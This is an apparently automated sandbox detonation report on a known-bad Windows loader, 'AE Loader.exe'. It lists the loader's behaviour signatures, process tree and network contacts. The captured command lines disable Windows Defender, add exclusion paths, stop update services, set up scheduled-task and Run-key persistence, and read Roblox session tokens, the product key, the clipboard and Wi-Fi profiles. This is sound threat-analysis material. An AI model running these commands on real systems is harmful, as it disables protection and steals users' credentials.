Analysis Overview
SHA256
922eedd1532bbc6b06b9c3d93b0c6207b0da565bb7fb511740010304fda56a6e
Threat Level: Known bad
The file AE Loader.exe was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Contacts a large (947) amount of remote hosts
Loads dropped DLL
Checks computer location settings
Unsecured Credentials: Credentials In Files
Clipboard Data
Executes dropped EXE
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Obfuscated Files or Information: Command Obfuscation
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
UPX packed file
Launches sc.exe
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Unsigned PE
Detects Pyinstaller
Enumerates physical storage devices
System Network Configuration Discovery: Wi-Fi Discovery
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Modifies registry key
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Gathers system information
Detects videocard installed
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-05 02:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 02:06
Reported
2024-11-05 02:08
Platform
win10v2004-20241007-en
Max time kernel
35s
Max time network
131s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Contacts a large (947) amount of remote hosts
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AE Loader.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AE Loader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AE Loader.exe
"C:\Users\Admin\AppData\Local\Temp\AE Loader.exe"
C:\ProgramData\Microsoft\hacn.exe
"C:\ProgramData\Microsoft\hacn.exe"
C:\ProgramData\Microsoft\based.exe
"C:\ProgramData\Microsoft\based.exe"
C:\ProgramData\Microsoft\based.exe
"C:\ProgramData\Microsoft\based.exe"
C:\ProgramData\Microsoft\hacn.exe
"C:\ProgramData\Microsoft\hacn.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym
C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe
C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\ProgramData\main.exe
"C:\ProgramData\main.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\ProgramData\crss.exe
"C:\ProgramData\crss.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command removed]"
C:\ProgramData\svchost.exe
"C:\ProgramData\svchost.exe"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\ProgramData\setup.exe
"C:\ProgramData\setup.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\ProgramData\crss.exe
"C:\ProgramData\crss.exe"
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command removed]
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2gwwyf4i\2gwwyf4i.cmdline"
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEA3.tmp" "c:\Users\Admin\AppData\Local\Temp\2gwwyf4i\CSC229DC49CB57442979C28C285F64D8449.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2868"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ire5zvi\5ire5zvi.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E2D.tmp" "c:\ProgramData\CSCF43CE2E5258F4DD697D053FEDB47933.TMP"
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4r3duunw\4r3duunw.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES20DC.tmp" "c:\Windows\System32\CSC1A7D769C659B400EA85FDABAD4AD8D84.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "systeminfo" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ko8RUfNOJ1.bat"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe
"C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.201.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 143.200.106.32:80 | tcp | |
| US | 204.51.240.12:80 | tcp | |
| UA | 109.86.252.157:80 | tcp | |
| DE | 51.75.90.208:80 | 51.75.90.208 | tcp |
| GE | 188.169.78.185:80 | tcp | |
| BR | 191.61.115.131:80 | 191.61.115.131 | tcp |
| US | 47.160.21.172:80 | tcp | |
| US | 8.8.8.8:53 | 208.90.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.115.61.191.in-addr.arpa | udp |
| US | 158.76.97.154:80 | tcp | |
| US | 65.14.224.183:80 | tcp | |
| NZ | 125.236.90.127:80 | tcp | |
